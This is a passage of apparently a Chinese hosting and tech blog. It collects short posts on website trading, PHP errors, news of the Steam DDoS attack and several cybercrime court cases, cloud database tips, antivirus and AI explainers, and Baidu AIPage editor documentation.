年。它以其高压缩比、免费开源以及对多种压缩格式的支持而广受欢迎。 #### 79万买的长城号网站流量暴跌 还记得上周主机吧说的知名站长79万卖的网站吗? 当时在站长圈非常热的话题,因为站长圈已经很久没有这么大手笔交易了。 不过今天,主机吧发现这个刚卖的网站出现了流量大跌的情况。 可以说已经跌到谷底了。 百度搜索网址也查不到了带www的域名了。 这是很明显的网站被降权了。查询该网站发现已经快一个月没更新了。 主机吧发现长城号的小程序还在,据主机吧所知百度小程序是不可以转让的, 那网站价值其实就低了,如果重新申请小程序重新做起来也是相当麻烦的。 主机吧其实不大了解买家为何花这么高的价格买下来,这个网站流量确实高,不过都是一些泛流量,本身价值就不大,能赚钱的方式估计就只有打广告了,不过现在广告联盟单价这么低,即使按日流量10万+来算,这网站一天能有500块收益算不错了,一个月即使按2万收益,一年24万,79万要回本也要三四年,这交易就不值了,风险太高了。 而且这种网站其实权重很低的,泛流量网站更多是靠海量的更新来维持网站流量,一但内容跟不上,网站流量会慢慢下跌,而且还有解决大量采集引起的百度惩罚问题。 当然了,买家敢花这么多钱买这个网站,估计这点承受能力还是有的。后期如果操作得当的话,还是有希望恢复的,不过以主机吧过去被降权的经验来看,要想恢复巅峰时期的流量起码得3个月左右。 #### 7b2主题使用PHP8.0以上版本后经常出现502 最近,主机吧在给一个新站做调整,需要用到7b2主题,发现网站一但使用PHP8.0、8.1、8.2、8.3版本后,网站时不时出现502。 检查后发现是PHP的一个叫opcache的扩展影响了 把这个扩展卸载了就没有出现502的情况了。 目前不知道什么原因,可能跟7B2主题的加密文件有关。 #### 8 月 24 日Steam被DDOS攻击细节纰漏 8 月 24 日晚间,有大量网友在社交平台反馈 Steam 平台无法登录,相关话题“steam 崩了”也登上微博热搜。据完美世界竞技平台公告显示,本次 Steam 崩溃是由于受到了 DDoS 攻击导致的。 8 月 25 日,奇安信 XLab 实验室发文指出,8 月 24 日晚,Steam 平台遭遇了 DDoS 攻击,导致许多用户无法登录或进入游戏,有近 60 个僵尸网络主控发起了此次攻击,攻击指令一夜暴涨了 2 万多倍。 ▲ Downdetector 用户报告的 Steam 中断情况 DDoS 攻击是指分布式拒绝服务攻击(Distributed Denial of Service),是攻击者利用一台或多台不同位置的计算机对一个或多个目标同时发动攻击,消耗目标服务器性能或网络带宽,导致服务器运行缓慢或宕机,从而造成服务器无法正常地提供服务的网络攻击类型。 “无论是攻击指令数量之大、主控僵尸网络之多,还是攻击烈度之猛,攻击组织之周密,本次 DDoS 攻击在我们的视野中都是近年来极为罕见的。”奇安信 XLab 实验室披露了本次 DDoS 攻击事件的幕后细节:有近 60 个僵尸网络主控发起了此次攻击,攻击指令一夜暴涨了 2 万多倍,对 Steam 全球网站轮番攻击,涉及 13 个国家和地区的 107 个 Steam 服务器 IP。 1、攻击指令极大,较平时激增 2 万倍,对比日常变化极为明显 此次攻击事件 Xlab 实验室一共观察到了 28 万条针对 Steam 平台的攻击指令,根据历史长期观察,过去针对 Steam 的攻击也经常有,但是往往攻击指令都在两位数。“昨天晚上直接暴涨 2 万多倍,这么高的攻击指令数字,我们从业以来几乎都是极其少见的”。 ▲ 过去一年针对 steam 平台的攻击事件攻击指令趋势 2、动用僵尸网络的规模极大,达到近 60 个 有近 60 个僵尸网络主控发起了此次攻击。其规模是上次特朗普与马斯克直播访谈遭到 DDoS 攻击事件(4 个僵尸网络)的 15 倍。另外,还有其他攻击团伙使用 NTP、CLDAP 反射放大攻击等方式也参与了此次攻击事件。如此规模的僵尸网络动用,实属多年来罕见。 3、攻击烈度极猛,攻击者火力全开,涉及 13 个国家和地区的 107 个 Steam 服务器 IP 据介绍,8 月 24 日 18 点开始,攻击者集中火力猛攻亚洲的新加坡节点机房,以及 Steam 中国区代理的完美世界机房,到 25 日上午又切换到美国机房。 在时间的选择上,几乎和当地游戏高峰期(当地晚上和夜间)基本重合。重点攻击目标包括了中国、美国、新加坡、瑞典、德国、奥地利、西班牙、英国、日本、韩国、澳大利亚、智利、荷兰等 13 个地区的 107 个 Steam 服务器 IP。 ▲ 针对完美世界 Steam 服务器的部分攻击事件截图 如此看来,此次攻击事件更像是一起有预谋的针对黑神话悟空的攻击事件。 #### 8月1日至8月2日百度云加速维护通知 系统维护中,预计于今天上午7:00恢复正常服务,维护期间暂停域名的接入、编辑和配置变更,非常抱歉给您带来的不便。 已接入云加速的域名可正常使用安全和加速服务,无需做任何变更,不影响正常访问。 #### 90后黑客攻击某购物平台:一元购买走800万金饰 据媒体报道,湖北省公安厅披露了一起黑客攻击某购物平台、用 106 元骗走价值 800 余万元的黄金钻石的案例。 去年 11 月,湖北省安陆市公安局接到报案,有黑客攻击购物平台,在 10 月 17 日至 24 日一周内,以“ 1 元购”价格下单 106 笔,花费 106 元,骗走价值 800 余万元的黄金、手链、裸钻等贵重商品。 据悉,此黑客采取攻击后台的方式,每笔仅支付 1 元,却让后台系统认为其支付了对应的数万元货款,订单通过审核并发货。 该网购平台采用月底结算,所以一直到 11 月才发现。 由于从黑客作案到报案相隔时间较长,而且黑客使用了多个虚拟身份,警方辗转十多个省市,调查 20 余家银行 100 多个账户,调取 1000 多万条数据信息,直到今年 2 月 28 日才获得重大突破:涉案的 104 笔网购收货地都在安陆某建材市场大门口,湖北省省云梦县男子张某曾连续三天在此地点收货。 现年 26 岁的张某随后被确认为嫌疑人之一,他曾因网络诈骗被判刑一年半。 尽管张某随后“人间消失”,但警方恰好有 3 名侵犯公民个人信息的嫌疑人落网,让案件再次迎来转机。 原来,张某作案前,通过非法渠道购买了大量以他人身份开办的身份证、银行卡、U盾等信息。 警方顺藤摸瓜,抓获了 3 名曾向张某出售信息的嫌疑人,并掌握到张某除用于作案的“身份”之外,手中还有多个“身份”,其中一个显示他人在深圳。专案组民警随即赶赴深圳,将张某抓获。 5 月 9 日,张某交待了赃物藏匿地点。当日,民警赶赴张某老家,在屋顶瓦片下起获 20 公斤黄金制品和裸钻等贵重物品,这些物品很多甚至连包装袋都没有拆,已被全数收缴。 #### 95后技术宅论坛上结识朋友竟是间谍 反手举报获奖励25000元 事件概述 2023年,一位名叫阿强的95后技术宅,在某科技论坛上结识了一名昵称为“暗影Dark”的用户。他们两人有着共同的兴趣,因此很快成为了朋友。然而,随着时间的推移,阿强开始怀疑Dark的真实身份和动机。当Dark要求阿强提供他所在公司的一些敏感数据时,阿强意识到了问题的严重性,并决定向国家安全机关举报Dark的可疑行为。 事件细节 阿强是一位在高新技术企业工作的青年设计师,他参与了某国家级项目的研发工作。在论坛上,他发现了一些数据模型的设计参数,这些数据模型对他平时的工作有很大的参考价值。这些数据的提供者就是Dark,他没有透露任何个人信息,只是表现出对阿强的设计能力的欣赏,希望和他成为朋友。 在他们的私人聊天中,Dark经常向阿强分享国外先进的数据模型设计方案,这给阿强提供了很多设计灵感。然而,Dark对阿强收集的最新数据模型似乎不感兴趣,反而更关心阿强的日常工作内容。这让阿强开始对Dark的身份产生怀疑。 一天晚上,Dark向阿强请求参考他正在参与的国家级项目数据,尽管这个项目涉及到国家机密,但阿强出于帮助朋友的考虑,还是把公司的部分公开数据发给了他。然而,Dark在收到数据后,竟然向阿强转账2000元,并表示如果提供内部数据可以获得更高的报酬。这使得阿强对Dark的身份和动机产生了更大的怀疑。 事件结果 阿强在意识到Dark可能是境外间谍后,选择了举报他的可疑行为。国家安全机关在接到举报后调查发现,Dark确实是某国间谍情报机关的运营人员,专门通过网络渗透策反我国涉密敏感岗位的人员。由于阿强的举报有功,国家安全机关给予了他5000元的现金奖励,而阿强所在的公司在宣扬维护国家安全的正面典型时,又给了他20000元的奖励。 这个事件再次提醒我们,任何时候都不能忽视网络安全和个人信息安全的重要性,同时也展示了我国对于举报间谍行为的鼓励和奖励政策。 国家安全机关提示   《中华人民共和国反间谍法》第十六条规定,任何公民和组织发现间谍行为,应当及时向国家安全机关举报;向公安机关等其他国家机关、组织举报的,相关国家机关、组织应当立即移送国家安全机关处理。国家安全机关应当将受理举报的电话、信箱、网络平台等向社会公开,依法及时处理举报信息,并为举报人保密。   公民和组织发现间谍行为   请及时通过12339举报受理电话   网络举报平台   国家安全部微信公众号   举报受理渠道   或者直接向当地国家安全机关   进行举报   共同筑牢反间防谍的   钢铁长城 #### 96年小伙“神操作”!薅阿里云CDN羊毛致损9万,换来3年缓刑+罚金! 家人们,今天看到一个案子,真是“技术流”用错了地方!一个96年的小伙,愣是把阿里云的CDN流量当成了“免费午餐”,结果把自己送上了法庭,赔了钱还差点进去! 主角登场: 方某,男,96年生人,中专学历,无业。 安徽户籍,杭州居住。 魔幻操作:时间回到2024年5月底,这位方同学干了件“大事”: 盯上小程序: 他发现某公司做的一个购物微信小程序(叫“XXX”)有个上传功能。 技术“加持”: 利用网页抓包分析和切片上传技术(听着就挺硬核),他把从自己买的“XX视频”(后来改名叫“XXX剧”)APP里下载的视频,转成TS格式,再切片! 狸猫换太子: 最骚的操作来了! 他把这些视频切片文件,伪装成PNG图片! “借”服务器: 然后,他把这些“假图片”一段段上传到了人家购物小程序的阿里云服务器上。 “免费”播放: 最后,他在自己的“XXX剧”网站上提供播放链接。用户一点开看视频,消耗的全都是人家购物小程序阿里云账户的CDN流量!纯纯的“借鸡生蛋”、“薅羊毛”啊! 天价账单:这“免费午餐”可一点也不便宜!从5月底干到案发,仅仅一个月时间(主要算6月份),他就给人家公司造成了高达9万多人民币的阿里云流量费用损失!这羊毛薅得够狠! 东窗事发 & 积极补救: 被抓后,方某倒是老实,全交代了。 家里人动作也快,火速赔了95,000元给受害公司(基本覆盖损失了)。 警察叔叔没收了他的作案工具:手机一部、电脑一台。 在法院审理时,他还主动退出了赚到的2000块违法所得。 法庭见真章:法院一看,这案子没跑儿: 罪名成立:非法控制计算机信息系统罪! (刑法第285条第二款)为啥?因为他未经允许,把人家的服务器当成了自己的免费CDN节点来控制和使用。 损失9万多,情节“特别严重”,这罪名可是要重罚的。 判决结果:虽然事不小,但看在他: 认罪认罚 老实交代 积极赔钱退赃法院决定从宽、从轻处理: 判处有期徒刑三年,缓刑三年! (也就是说,考验期三年内老实做人就不用真坐牢了)并处罚金人民币五千元!没收作案手机、电脑!追缴退出的2000元违法所得! 法官最后还语重心长地告诫他:回去好好做人,遵纪守法,接受社区监督,做点公益,当个对社会有用的人! 博主锐评: 这哥们儿的技术能力是有的,可惜路子走歪了!为了省点视频带宽的钱(或者想“白嫖”阿里云资源),搞这种“偷梁换柱”的把戏,结果9万损失+5千罚金+工具没收+3年缓刑的“套餐”直接安排上,还背上了案底,真是捡了芝麻丢了西瓜,亏大发了! 技术无罪,但用技术去侵犯他人权益、非法牟利,那就是违法犯罪! 这案子也给所有“技术宅”提个醒:法律的红线,千万别碰! 想用云服务,老老实实自己开账户付费,别动歪脑筋! #### 9块9弄了个腾讯云TDSQL-C for MySQL数据库真香! 最近几天不知道什么原因主机吧博客偶尔数据库关停,导致网站访问不了,已经遇到两次了,严重影响网站体验,主机吧监控发现应该是突发并发过大导致服务器上的数据库自动停了。 这就是本地数据库的坏处,遇到并发过高的,会自动停止,所以主机吧就想着,要不弄个云数据库吧。 考虑到主机吧源服务器用的是腾讯云的,所以优先买腾讯云的数据库。查了下数据库价格1核1G的才89元一年,很便宜! 不过主机吧发现还有更便宜的,腾讯云TDSQL-C for MySQL数据库,更便宜的,一年只要9.9元! 这个TDSQL-C数据库号称是腾讯自研的新一代高性能高可用的企业级分布式数据库,100%兼容Mysql。 果断入手了9.9。 开通后发现其实这个数据库跟MySQL没啥区别,简单的创建数据库后,导入备份的数据库即可。云数据库每天都会帮你自动备份,爽歪歪。数据库自带3T的容量,不过以主机吧检验来看,虽然数据库容量大,但是要导入这么大的话,运行起来内存CPU肯定也要非常高。 导入完数据库后,我们再把云数据库和云服务器连接起来,一般云服务器的外网带宽是要收费的,不过我们的数据库和服务器都是腾讯云的,可以实陆内网免费连接,只要不超过5G带宽就行。 建立私有网络把云服务器和数据库关联起来就可以实现内网互联了,这里主机吧就不多说了,大家自行摸索了。然后我们进入网站数据库连接文件,修改之前创建的数据库名、密码以及云服务器库的内网IP即可正常使用。 目前主机吧网站运行稳定,网站速度也不差,更重要的是使用云数据库后,网站并发能力高很多,9块9的云数据库真香! #### 9款知旬中文杀毒软件推荐 以下是9款中文的软件防火墙: 360安全卫士:一款非常知名的综合性安全软件,它包括了防病毒、防木马、防间谍软件、网络防火墙等多种功能,可以有效地保护用户的计算机安全。 火绒安全软件:又称“火绒墙”,它是一款免费的防火墙软件,具有实时监控、流量管理、漏洞修复等功能,可以有效地保护用户的网络安全。 卡巴斯基网络安全软件:一款综合性的网络安全软件,可以提供防病毒、防火墙、反垃圾邮件等多种保护功能,可以有效地保护用户的计算机安全。 腾讯电脑管家:一款全方位的安全软件,包括了杀毒、防护、清理、加速等多种功能,可以有效地保护用户的计算机安全。 瑞星安全软件:一款集杀毒、防火墙、漏洞修复、流量管理、网站安全等多种功能于一身的网络安全软件,可以有效地保护用户的网络安全。 微软安全软件:也称“Windows Defender”,是一款自带的防病毒软件,可以提供实时保护、定期扫描等功能,可以有效地保护Windows系统的安全。 金山毒霸:一款知名的安全软件,提供了杀毒、防火墙、流量管理等多种功能,可以有效地保护用户的计算机安全。 Norton安全软件:一款知名的安全软件,可以提供防病毒、防火墙、反垃圾邮件等多种保护功能,可以有效地保护用户的计算机安全。 Avast安全软件:一款集杀毒、防火墙、流量管理等多种功能于一身的网络安全软件,可以有效地保护用户的网络安全。 #### ACG 爱好者社区半次元停止服务,APP和官网无法访问 6 月 12 日消息,ACG 爱好者社区半次元宣布,因公司业务发展上的调整,半次元将于 2023 年 7 月 12 日起停止运营及服务,停止运营后 App 及官方网站将无法登录及访问。 具体安排: 2023 年 6 月 12 日:停止新用户注册、半次元 App 在 App STORE 和安卓应用商店下架; 2023 年 6 月 30 日:停止内容发布、评论等产品功能; 2023 年 7 月 12 日:停止 App 及官网的登录及所有页面访问,关闭服务器。 钱包余额提现: 提现时间:2023 年 6 月 12 日-2023 年 7 月 12 日 提现路径:App-我的-我的钱包 个人信息下载: 下载时间:2023 年 6 月 12 日-2023 年 7 月 12 日 下载路径:App-我的-右上角设置-个人信息下载 半次元汇聚了包括 Coser、绘师、写手等创作者在内的众多二次元同好,共设 Cosplay、绘画、写作、讨论等多个频道,拥有很多同人图 / 小说 / COS 内容。 #### Adobe Flash Player再见!微软Windows 10系统将于七月起彻底移除 5月6日消息:日前微软宣布,将于将于7月推出21H1版本更新,以删除系统自带的 Adobe Flash Player。这个更新只会删除系统自带的 Adobe Flash Player,用户自己安装的相关软件并不会受影响。 在今年1月1日,微软 Edge、Google Chrome、Safari、火狐等浏览器已经宣布停止支持 Flash。除此之外,Windows8.1、Windows Embedded8标准版和 Windows Server2012也都会有相应的版本更新。 据了解,目前大部分网站已经将Flash Player用HTML5支持的相关元素进行了替换,不过仍然有部分内容需要通过Flash插件才能显示,不过其不安全、泄露隐私、进程服务无法彻底终止等特性也始终让人诟病。 #### AI 写作要凉!谷歌把 AI 写作内容视为垃圾信息从搜索结果中移除! 4月12日消息:GPT- 3 是由在旧金山的人工智能公司OpenAI训练与开发,模型设计基于谷歌开发的变换语言模型。GPT- 3 的神经网络包含 1750 亿个神经,为全世界参数最多的神经网络模型。 SIMFEROPOL, RUSSIA - NOVEMBER 22, 2014: Photo shoot of Google logotype on a keyboard button. Google is an American multinational corporation specializing in Internet-related services and products OpenAI 的文本生成神经网络 GPT-3 被认为能产生以假乱真的文章,那么搜索引擎应该如何对待它生成的内容?据Search Engine Land报道,Google 的 Search Advocate John Mueller上周在一场搜索引擎优化(SEO)的线上对谈中,在被问到Google对提供AI自动生成的内容会如何反应时,他表示这类网站将被归类在自动生成内容的网站,意指这违反了Google的网站站长质量指南。 根据Google的网站站长质量指南,系统在大多数情况下都会自动发现垃圾内容并将其从搜索结果中移除。为了确保索引质量,Google还会采取手动操作将垃圾内容从搜索结果中移除。 不过,Google拒绝说明它是否真的能分辨出人类或AI自动生成的内容。 #### AI 去衣“1 块 5 一张”,男子非法制造七千余张不雅照片被捕 6 月 17 日消息,今天央视新闻 CCTV13《法治在线》曝光了一起“AI 脱衣”案件,北京一男子白某某在社交平台上刊载广告,声称可提供“一键去衣”服务,单价为“1 块 5 一张”,警方根据其留下的账号线索顺藤摸瓜抓获了嫌疑人。 从报道中获悉,该男子在 2023 年 6 月至 8 月利用 Stable Diffusion 框架配合特定 AI 模型,在社交平台公然发布广告,并利用微信 / QQ 等聊天工具进行交流转账,将他人提供的女明星、女同事、女同学照片制作为裸体不雅照片。 据检察机关统计,白某某在社交平台上发布的广告点击量有 3 万人左右,仅仅两个月,他已制作了近七千张不雅照片,获利近万元,对大量被害者名誉造成严重损失。目前北京市海淀区检察院已对白某某以涉嫌制作贩卖淫秽物品牟利罪提起公诉,追究其刑事责任。 #### AI 术语中什么是JEPA AI术语中什么是JEPA JEPA(Joint Embedding Predictive Architecture)是一个由Meta AI公司开发的自监督学习模型,它主要用于图像处理和计算机视觉任务。JEPA的设计灵感来源于人类和动物的学习方式,即通过观察世界来获取知识,而不需要人类标记的训练数据。 JEPA的工作原理 JEPA的核心思想是通过创建一个内部世界模型来进行学习,该模型将图像转换为抽象表示,并比较不同表示之间的相容性或相似性,而不是直接比较像素。这种做法有助于模型在学习环境的潜在空间时减少错误,并降低成本。 JEPA的特点 生成语义表征:与其他生成模型不同,JEPA不是直接生成像素,而是生成语义表征。这意味着模型的目标是让生成的语义表征与通过y-encoder生成的语义表征的距离最小。 更新目标编码器参数的方式:JEPA的网络架构包括两个编码器,其中一个负责处理上下文信息,另一个则用于预测缺失的部分。这种设计使得模型能够在抽象表示空间中进行预测和推理,而不是在像素空间中进行生成,从而避免了一些常见的生成错误,如模糊、失真、重复等,并提高了语义和结构信息的保留。 JEPA的优势 计算效率:JEPA在多个计算机视觉任务上表现出强大的性能,并且比其他广泛使用的计算机视觉模型更具计算效率。例如,Meta使用16个A100 GPU在不到72小时内训练了一个632M参数的视觉变换器模型,它在ImageNet上的低样本分类任务上达到了最先进的性能,每个类别只需要12个标注样本。 泛化能力:JEPA学习到的表示可以用于许多不同的应用,而不需要进行大量的微调。这使得模型具有很好的可扩展性和可迁移性,可以适应不同大小和分辨率的图像,并且可以很容易地适应不同领域或任务。 结论 JEPA是一个创新的自监督学习模型,它通过生成语义表征和优化更新目标编码器参数的方式,展现了在图像处理和计算机视觉领域的强大能力和计算效率。它的设计更加接近人类智能的学习方式,为AI系统的未来发展提供了新的思路。 #### AI 术语中什么是LLM 什么是LLM LLM的定义 LLM(Large Language Model,大型语言模型)是一种基于深度学习的自然语言处理技术,可以从大规模语料库中学习自然语言的结构和规律。 LLM的应用场景 LLM技术在多个领域都有广泛应用,包括但不限于: 文本生成:生成连贯、有逻辑的文本内容。 自动问答:根据给定的上下文回答自然语言问题。 智能客服:提供高效的客户支持和互动。 机器翻译:进行高质量的翻译工作。 内容生成:生成广告文案、新闻文章等内容。 LLM的优势 LLM的主要优势在于其强大的语言理解和生成能力,这使得它在处理自然语言任务时表现出色。此外,LLM还具有高度的通用性,可以广泛应用于各行各业以及各种应用中,提供更加自然、高效、便捷的服务。 LLM面临的挑战 尽管LLM技术取得了显著的进步,但仍面临一些挑战,包括如何确保其决策的公正性和透明性,以及如何防止其被恶意利用等问题。 LLM的未来展望 随着技术的不断发展,LLM将在未来发挥更大的潜力,不仅在自然语言处理领域,还在其他领域如智能助手、内容创作等方面展现出更大的应用价值。 #### AiLMe天燕大模型开放公测 6月7日 消息:麒麟合盛网络技术股份有限公司(APUS)发布的自研多模态人工智能大模型AiLMe(天燕大模型)开放公测。 据悉,“AiLMe”于4月18日正式发布,AiLMe参数已达千亿规模,具备对文本、图像、视频、音频的理解和生成能力。 针对具体应用场景,APUS从AiLMe内蒸馏出文本模型“异雀八”、图像模型“异雀三”、视频模型“异雀四”、音频模型“异雀六”四个垂直领域精炼模型,并基于此创新研发出“智能问答大师、简笔成画、墨染、Daily Astro、Star Night、KJV Bible Now、PicPik”等系列AI产品。 AiLMe天燕大模型官网:www.apusai.com/#/ #### AingDesk:一键部署DeepSeek等上百款AI模型在自己电脑,开源免费无限制! 还在为本地部署AI模型操作繁琐而头疼?还在用各种云服务被"服务器繁忙"支配?现在,一款专治"AI使用焦虑"的神器已上线——AingDesk!支持macOS/Windows双端,开箱即用,完全免费!「AingDesk」简介 AingDesk是一款开源免费、功能强悍的客户端软件,能够一键轻松地将DeepSeek及其他数百款AI模型部署至个人电脑,同时兼备联网搜索功能,可以让你的AI变得更加智能。更令人欣喜的是,AingDesk还支持在线分享功能,可以将你电脑上部署好的模型分享给他人使用,无论是宿舍内共用DeepSeek,还是在办公室“私藏”模型,AingDesk都能轻松应对,让协作与分享变得轻而易举。 官方网址:https://www.aingdesk.com  「三大法宝」 1️⃣极速部署 以往部署模型的时候,我们经常会遇到一个问题,模型下载到最后只有几kb/s甚至直接没了速度,我们只能苦苦等待,而AingDesk支持自动选择最优下载线路及重连续传,当别人下载大模型还在用「青铜段位」的等待大法,你已经用上「王者级」极速通道,分分钟把百亿参数模型抱回家。 2️⃣深度联网 当我们问一些时效性较强的问题,或者说AI不知道的问题时,AI通常就会直接摆烂或者已读乱回,就像下面这样,比如我问宝塔面板是什么 当我开启联网搜索之后我们再问一下同样的问题试一下 这么一看,哪怕是广被大家“差评”的deepseek:r1:1.5b模型,是不是也有一战之力。AingDesk支持百度、搜狗等在内的多个搜索引擎,通过高效检索外部知识库弥补参数量限制,大幅提升答案的实时性和准确性,让你的AI不再受限于本地算力,实现低成本、高响应的智能服务。 3️⃣模型共享 AingDesk支持生成专属分享链接→微信/QQ/钉钉/飞书直接发松给好友使用,宿舍共享DeepSeek/办公室“私藏”模型全都不在话下,价格从「一杯奶茶」到「全年晚饭」自由定价。 「隐藏功能」拉满 1️⃣暗黑模式 用户可根据环境光自动切换深色界面,在夜间或低光场景下保护视力,同时享受更沉浸的操作体验,妈妈再也不担心我熬夜写论文了 2️⃣多语言支持 支持21种语言,简体中文、英语、日语、韩语、法语、德语、俄语……界面文案自动适配,一键切换语言即可开启本地化体验 3️⃣模型管理 支持包括DeepSeek、Qwen在内的上百款模型,无论是文本生成、自然语言处理,用户都可以根据具体需求选择合适的模型进行快速部署和应用。 「迭代」计划 支持多种第三方API接入 多数据源知识库支持 本地部署文生图混合模型 「下载」链接 下面就给大家奉上超实用的 AingDesk 「下载」地址,快来一起体验吧! AingDesk官网:https://www.aingdesk.com/zh/ 开源地址: Github:https://github.com/aingdesk/AingDesk CNB:https://cnb.cool/aingdesk/AingDesk #### aipage动态数据分类管理 1 新增分类 站点后台文章、产品、商品数据均是通过分类进行管理,在添加数据前需要设置好对应的分类,新增分类的时候主要需要设置名称和路径,名称是分类的名称,例如公司新闻、行业新闻、产品案例等,根据实际的分类名称设置,路径是站点发布后该分类的URL标识,例如设置news,域名是www.abc.com,那么发布后访问地址是http://www.abc.com/news(部分老分类是二级路径)。 其他设置中需要关注的是SEO设置,此功能允许每个分类单独设置页面的TDK,如果不设置默认将使用系统对应页面模板的SEO设置,如果均未设置页面标题将按照推荐的规范按照[分类名称]-[站点名称]格式自动展示,一般推荐对分类进行针对性的SEO设置。 自定义权限可以控制此分类的数据允许哪些角色的后台管理人员编辑,可以精确到分类对数据进行管理,避免人员误操作。 自定义系统模板则是用来设置当前分类使用系统哪个列表和详情模板,默认系统一般只有一个分类列表和详情模板,可以自定义列表和详情模板来对指定的分类使用不同的展示效果。 分类层级的管理方式是横向拖拽左侧按钮,或者编辑的时候直接选择对应分类的右侧加号按钮添加子分类。 2 删除分类 删除分类对应的数据并不会删除,但是页面中可能会无法展示,如果删除了分类需要对分类里面的数据重新设置分类,一般不建议删除分类,直接对分类进行修改即可。 3 分类跳转 网站跳转分类设置方式是点击交互选择分类列表页,然后选择需要跳转的目标分类即可。点击的时候将自动打开对应分类的系统列表页 4 分类导航菜单 部分系统列表页边栏菜单显示的是站点同类所有分类列表,支持设置排除项,另外还有部分分类列表版块显示的这是当前分类的一级分类下面的子菜单,两种显示有所差别。如果想自己设计系统列表页分类边栏菜单,可以拖拽垂直菜单中的元素并且设置绑定系统分类数据,这样元素将自动绑定站点分类数据。 #### aipage域名已备案但被拦截阻止访问 大陆线路必须在百度智能云平台备案后使用(备案系统地址: https://beian.bce.baidu.com/),如果已经在其他平台备案,同样需要在智能云新增备案。 未备案的域名解析到大陆线路后6小时内将被封禁,访问出现备案封禁提示。如果域名已在平台完成备案,正常1天内将自动解封,如果超过1天仍未解封,请发工单联系技术客服处理。 #### aipage小程序主题色设置 小程序主题设置能够批量设置系统页面和元素的颜色,主题设置在左侧全局设置里,其中最重要的是基色,相当于站点的主题色,其他几个颜色可以看情况设置。一般推荐站点设计开始前确认一个最主要的主题色作为基色(不能使用白色),修改主题色之后,部分系统页面的按钮等颜色会自动更换。 除了系统页面,普通元素的字体设置也可以选择是否使用主题,这样能快速的切换整站的主题: 有了相应设置,小程序风格切换就非常方便啦~赶紧试试吧 #### aipage小程序底部导航设计指南 小程序风格与app类似,一般底部需要提供固定导航,小程序规范要求如果开启底部导航,需提供2-5个切换页面,注意只有底部导航所包含的页面才会出现底部导航,其他页面推荐新页面打开。 开启底部导航的方式是编辑器左侧全局设置  -> 底部导航栏,在设置里点击启用。 企业后需要添加2-5个导航项之后导航才能使用,如果有导航下设置错误(例如导航页面未设置),导航会提示错误信息,草稿预览将无法使用。 导航添加完毕且草稿预览正常后,需要提审而且审核通过才能发布到线上。右上角预览发布里进行提审,前提是小程序已完成授权。 #### aipage小程序弹框组件设计 进入网站小程序编辑器界面,在编辑器左侧工具栏的组件中将『模态框』拖动到界面里,然后在右侧工具栏中点击『设置条件』来为模态框的渲染设置条件,例如 test === 1,然后可以设置按钮等其他组件在点击时将变量设置为 1,即可使模态框满足展示条件正常显示出来。 当在右侧工具栏的『数据』中勾选 『点击遮罩层关闭』后,当模态框显示出来时,点击模态框周围的暗色区域即可使模态框隐藏。 模态框默认是展示一个空白的容器,可以往里面添加其他组件来填充模态框的内容。 #### aipage小程序提审发布流程 在小程序编辑器完成编辑后,在编辑界面的左上角点击『预览发布』按钮: 弹出如下窗口: 若暂时未给自己的小程序授权,点击了解更多,按照对应渠道的授权规则完成授权即可,完成授权后,上面的弹框中『前往授权』按钮会变成『发起审核』,同时对应小程序右侧还回出现预览二维码,供您预览自己的小程序。确认无误后,可以点击每个小程序的『发起审核』按钮来分别发起审核或点击『一键发布』按钮自动将所有完成授权的小程序发起审核。 发布完成后,在站点后台 我的小程序 -> 审核与发布 页面可以查看自己网站三端小程序的审核进度和提交历史。 #### aipage小程序横向滑动版块设计 横向滑动是app和小程序的常见效果,平台小程序支持普通版块和动态版块的横向滑动模式。 1 普通版块 容器设置想要的宽度即可。宽度超过屏幕默认分辨率750就会出现横向滚动条,拖拽滚动条到对应的位置可以进行自定义的设计,这种方式比较灵活,但不方便绑定动态数据 2 自由列表版块 自由列表支持绑定各种类型的动态数据,默认是纵向滚动加载的模式,对于多列的自由列表只要布局样式设置选择横向滚动即可快速实现动态列表的横向滑动效果。 #### aipage小程序自定义动态列表样式设计 小程序和网站一样都可以自定义动态列表样式,使用方法非常简单,拖拽元素中的自由列表到页面中想要的位置 自由列表支持多种数据类型,可以轻松定义文章、产品、商品等各种动态列表样式 选择数据类型和显示列数后,默认会有一个示例的动态列表 设置各个元素的位置和样式,鼠标激活其他版块,自由列表便会渲染实际效果,稍加调整便可以设计一个新的文章列表样式 除了常见的列表模式,自由列表也支持横向滑动模式,可以快速变成横向滑动动态列表样式 #### aipage普通内置版块设计操作 内置版块是系统预置的支持响应式的分类样式版块,版块已经具备较为固定的设计风格,提供了相应的界面数据和样式设置,主要通过设置面板即可完成内置版块的设计操作。内置版块按不同的使用场景和类型进行分类,不同分类的版块可以直接切换设计,切换后依旧保持数据不变。例如版块标题、副标题、列表项等,在切换设计之后不需要重新设置。 1 版块工具栏说明 切换设计是版块最常见的操作,如果当前内置版块效果不适合,则可以考虑切换设计来查看其他效果: 其他工具栏功能说明如下: 上下箭头: 上下移动版块 版块设置:打开版块设置面板,也可以在空白处点击版块在鼠标位置设置按钮里打开 复制:复制版块 修复布局:取消自定义拖拽版块组件移动的位置 填充示例数据:填充默认数据 设为全局版块:将当前版块添加到全局版块里方便复用 转成普通版块:将当前版块脱离全局版块变成普通版块方便自定义修改 删除:删除当前版块 2 版块背景与设置 点击版块空白区域,鼠标附近会显示背景和设置按钮,点击即可快速设置版块背景或者打开版块设置面板。背景包括纯色、渐变、视频、图片等方式,使用纯色背景时还可以添加波浪背景动画装饰效果。在轮播大图等位置可以合理使用视频背景来增强品牌效果,但是视频会影响页面总体加载时间,不要过度使用。 3 版块自定义样式 在样式设置里可以对版块样式进行调整,例如一些动态列表版块支持对标题、副标题等主要字段的字体和对齐方式进行调整,一般移动端可能需要调整显示列数及字体等。 #### AIPage更新5月更新:网站增加四大功能点,小程序增加三大功能点 AIPage每期产品更新,汇总近期更新的重要产品功能,帮助大家了解到AIPage产品功能的最近动态。 本期我们AIPage产品更新优化的内容如下: 设计器部分 01 网站普通图片元素支持灯箱效果 灯箱效果是指当网页内的图片在被点击后图片可以在浮层方式放大展示,普通图片增加灯箱效果,移动端下方便用户点击查看大图,提高了用户体验,视觉效果更加! 使用方法:打开『百度智能门户AIPage 』设计器,找到【图片-基础图片-开启图片灯箱】如下图所示: 02 网站及小程序支持交互跳转指定预约详情 网站及小程序支持跳转指定预约详情,这一功能的优化对用户带来了很大的方便。 使用方法:打开『百度智能门户AIPage 』设计器,找到【交互-详情页-预约】如下图所示: 03 PC端支持添加持续动画 网页中加入适当的持续动画不仅可以让网站美观,而且可以使展示的内容变得栩栩如生。 使用方法:打开『百度智能门户AIPage 』设计器,找到【动画-动画设置】如下图所示: 04 